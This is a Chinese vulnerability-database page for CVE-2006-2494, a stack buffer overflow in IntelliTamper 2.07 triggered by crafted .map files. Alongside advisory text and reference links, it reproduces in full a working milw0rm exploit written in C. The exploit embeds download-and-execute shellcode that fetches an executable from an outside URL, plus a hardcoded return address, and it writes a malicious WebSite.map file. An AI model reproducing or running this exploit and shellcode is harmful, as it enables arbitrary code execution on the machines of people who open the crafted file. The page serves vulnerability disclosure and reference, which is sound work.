CVE-2006-2494
CVSS5.1
发布时间 :2006-05-19 23:02:00
修订时间 :2011-03-07 21:36:18
NMCOES    

[原文]Stack-based buffer overflow in IntelliTamper 2.07 allows remote attackers to execute arbitrary code via a crafted .map file.


[CNNVD]IntelliTamper 多个缓冲区溢出漏洞(CNNVD-200605-366)

        IntelliTamper是用于拦截网站弹出窗口的浏览器插件。
        IntelliTamper中存在多个缓冲区溢出漏洞,如果用户受骗访问了恶意网页的话就可能导致执行任意指令。
        1) 在读取.map文件时存在多个栈溢出。如果用户打开的地图文件中包含有大于4096字节的行或大于480字节的FOLDER##行的话,就会触发这些溢出。
        2) 如果网页中包含有大于512字节的超长链接的话,扫描该网页就会触发栈溢出。
        3) 在处理扫描站点的HTTP响应时存在栈溢出。如果响应中包含有超过512字节的超长Server头的话,就会触发这个溢出。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2494
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2494
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-366
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2008/2120
(UNKNOWN)  VUPEN  ADV-2008-2120
http://www.vupen.com/english/advisories/2006/1860
(UNKNOWN)  VUPEN  ADV-2006-1860
http://securitytracker.com/id?1016117
(UNKNOWN)  SECTRACK  1016117
http://secunia.com/advisories/20172
(VENDOR_ADVISORY)  SECUNIA  20172
http://xforce.iss.net/xforce/xfdb/26551
(UNKNOWN)  XF  intellitamper-map-bo(26551)
http://www.securityfocus.com/bid/18039
(UNKNOWN)  BID  18039
http://milw0rm.com/exploits/1806
(UNKNOWN)  MILW0RM  1806

- 漏洞信息

IntelliTamper 多个缓冲区溢出漏洞
中危 缓冲区溢出
2006-05-19 00:00:00 2006-05-22 00:00:00
远程  
        IntelliTamper是用于拦截网站弹出窗口的浏览器插件。
        IntelliTamper中存在多个缓冲区溢出漏洞,如果用户受骗访问了恶意网页的话就可能导致执行任意指令。
        1) 在读取.map文件时存在多个栈溢出。如果用户打开的地图文件中包含有大于4096字节的行或大于480字节的FOLDER##行的话,就会触发这些溢出。
        2) 如果网页中包含有大于512字节的超长链接的话,扫描该网页就会触发栈溢出。
        3) 在处理扫描站点的HTTP响应时存在栈溢出。如果响应中包含有超过512字节的超长Server头的话,就会触发这个溢出。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.intellitamper.com/

- 漏洞信息 (1806)

IntelliTamper 2.07 (*.map file) Local Arbitrary Code Execution Exploit (EDBID:1806)
windows local
2006-05-19 Verified
0 Devil-00
[点击下载] [点击下载]
///////////////////////////////////////////////////////////////////
//++
// IntelliTamper web analysis ( *.Map File Handling Local Exploit )
//
// Discovery By: Devil00 [ o.y.6@hotmail.com ]
// Coded By: JAAScois [ http://www.jaascois.com ]
//++
///////////////////////////////////////////////////////////////////
// Test on: IntelliTamper v2.07

#include <stdio.h>
#include <string.h>

// shellcode [ download & run executive file ]
unsigned char shellcode[] =
"\xEB\x5D\x5F\x8B\xF7\x80\x3F"
"\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x33\xC9\xB5\x05\x8B\xFE\x2B\xF9"
"\x8B\xEF\xB5\x03\x2B\xF9\x8B\xD7\xB2\x7C\x8B\xE2\x89\x75\xFC\xB5\x40\xC1\xE1\x08"
"\x89\x4D\xF8\x8D\x49\x3C\x8B\x09\x03\x4D\xF8\x8D\x49\x7F\x41\x8B\x09\x03\x4D\xF8"
"\x8B\xD9\x8B\x49\x0C\x03\x4D\xF8\x81\x39\x4B\x45\x52\x4E\x74\x07\x8D\x5B\x14\x8B"
"\xCB\xEB\xEB\x33\xC0\x53\xEB\x02\xEB\x7C\x8B\x33\x03\x75\xF8\x80\x7E\x03\x80\x74"
"\x14\x8B\x3E\x03\x7D\xF8\x47\x47\x56\x8B\x75\xFC\x33\xC9\xB1\x0D\xF3\xA6\x5E\x74"
"\x06\x40\x8D\x76\x04\xEB\xE0\x5B\x8B\x5B\x10\x03\x5D\xF8\xC1\xE0\x02\x03\xD8\x8B"
"\x03\x89\x45\xF4\x8B\x5D\xFC\x8D\x5B\x0D\x53\xFF\xD0\x89\x45\xF0\x8D\x5B\x09\x53"
"\x8B\x45\xF4\xFF\xD0\x89\x45\xEC\x8B\x45\xF0\x8B\x40\x3C\x03\x45\xF0\x8B\x40\x78"
"\x03\x45\xF0\x89\x45\xE8\x8B\x40\x20\x03\x45\xF0\x8D\x7B\x08\x33\xD2\x57\x8B\x30"
"\x03\x75\xF0\x33\xC9\xB1\x0F\xF3\xA6\x74\x0B\x5F\xEB\x02\xEB\x7A\x42\x8D\x40\x04"
"\xEB\xE7\x8B\x5D\xE8\x33\xC9\x53\x5F\x8B\x7F\x24\x03\x7D\xF0\xD1\xE2\x03\xFA\x66"
"\x8B\x0F\x8B\x5B\x1C\x03\x5D\xF0\xC1\xE1\x02\x03\xD9\x8B\x1B\x03\x5D\xF0\x89\x5D"
"\xE4\x8B\x55\xFC\x8D\x52\x2D\x8D\x7D\xE0\x33\xC9\xB1\x06\x51\x52\x52\x8B\x75\xF0"
"\x56\xFC\xFF\xD3\xFD\xAB\x5A\x59\x38\x2A\x74\x03\x42\xEB\xF9\x42\xE2\xE8\xB1\x04"
"\x51\x52\x52\x8B\x75\xEC\x56\xFC\xFF\xD3\xFD\xAB\x5A\x59\x38\x2A\x74\x03\x42\xEB"
"\xF9\x42\xE2\xE8\xFC\x52\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\xEB\x02\xEB\x7C"
"\x52\x8B\x45\xD8\xFF\xD0\x5B\x89\x45\xB8\x33\xD2\x52\x52\x52\x52\x53\x8B\x45\xC8"
"\xFF\xD0\x89\x45\xB4\x8D\x7B\x08\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52"
"\x52\x57\x50\x8B\x45\xC4\xFF\xD0\x89\x45\xB0\x8D\x55\xAC\x52\x33\xD2\xB6\x1F\xC1"
"\xE2\x08\x52\x8B\x4D\xB8\x51\x50\x8B\x45\xC0\xFF\xD0\x8B\x4D\xB0\x51\x8B\x45\xBC"
"\xFF\xD0\x8B\x4D\xB4\x51\x8B\x45\xBC\xFF\xD0\x33\xD2\x52\x43\x43\x53\x8B\x45\xE0"
"\xFF\xD0\x89\x45\xA8\x8B\x7D\xAC\x57\x8B\x55\xB8\x52\x50\x8B\x45\xDC\xFF\xD0\x8B"
"\x55\xA8\xEB\x02\xEB\x17\x52\x8B\x45\xD4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xD0\xFF"
"\xD0\x33\xD2\x52\x8B\x45\xCC\xFF\xD0\xE8\x0D\xFE\xFF\xFF\x4C\x6F\x61\x64\x4C\x69"
"\x62\x72\x61\x72\x79\x41\x08\x4B\x45\x52\x4E\x45\x4C\x33\x32\x08\x57\x49\x4E\x49"
"\x4E\x45\x54\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x5F"
"\x6C\x63\x72\x65\x61\x74\x08\x5F\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61"
"\x6C\x41\x6C\x6C\x6F\x63\x08\x5F\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78"
"\x65\x63\x08\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x08\x49\x6E\x74\x65\x72"
"\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65"
"\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65\x61\x64\x46\x69"
"\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65\x48\x61\x6E\x64"
"\x6C\x65\x08\x72\x08\x78\x2E\x65\x78\x65\x08"
"http://www.jaascois.com/research/36601021/virus.exe" //<< The File Will 
DOWN & RUN [ not a real virus ]
"\x08\x01";

// Return Code:
unsigned char return_code[] =
"\x83\xC5\x48"
"\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64"
"\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64"
"\xFF\xE5\x33\xC0\x74\xBB";


int main(int argc, char* argv[])
{
FILE *hfile;
unsigned long Retaddr;
unsigned char buf[11160];

printf("IntelliTamper web analysis ( *.Map File Handling Local Exploit 
)\n\n");
printf(" Discovery By: Devil 00 [ o.y.6@hotmail.com ]\n");
printf(" Coded By: JAAScois [ http://www.jaascois.com ]\n");

// fill nop's
for(int k=0;k<11160;k++){
buf[k]=0x90;
}
// ..... ..... ...... ..... ... .... ..... ...... ... ........
strcpy((char*)&buf[0],(char*)&shellcode[0]);
buf[strlen((char*)shellcode)]=0x90;

// ...... ... ..... ........ .... ........
Retaddr=0x004055DF;
memcpy(&buf[11156],&Retaddr,4);

// ... ..... ..... ..... ..... ........ ...... ...... ....
memcpy(&buf[11087],&return_code[0],69);

hfile=fopen("WebSite.map","w+b");
if(hfile==NULL){
printf("-Error: fopen \n");
return 1;
}

fwrite(buf,11160,1,hfile);
fclose (hfile);

return 0;
}// JAAScois.com 17/05/2006

// milw0rm.com [2006-05-19]
		

- 漏洞信息

25657
IntelliTamper Site Map File Processing Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-05-19 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

IntelliTamper Map Files Buffer Overflow Vulnerability
Boundary Condition Error 18039
Yes No
2006-05-19 12:00:00 2008-07-21 10:58:00
Devil00

- 受影响的程序版本

IntelliTamper IntelliTamper 2.07

- 漏洞讨论

IntelliTamper is prone to a buffer-overflow vulnerability because the application fails to properly validate the size of attacker-supplied data before copying it into a finite-sized buffer.

This issue allows remote attackers to execute arbitrary machine code in the context of applications that use IntelliTamper. Failed exploit attempts will likely crash the application, denying service to legitimate users.

IntelliTamper 2.07 is vulnerable; other versions may also be affected.

- 漏洞利用

The following exploit code is available:

- 解决方案

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站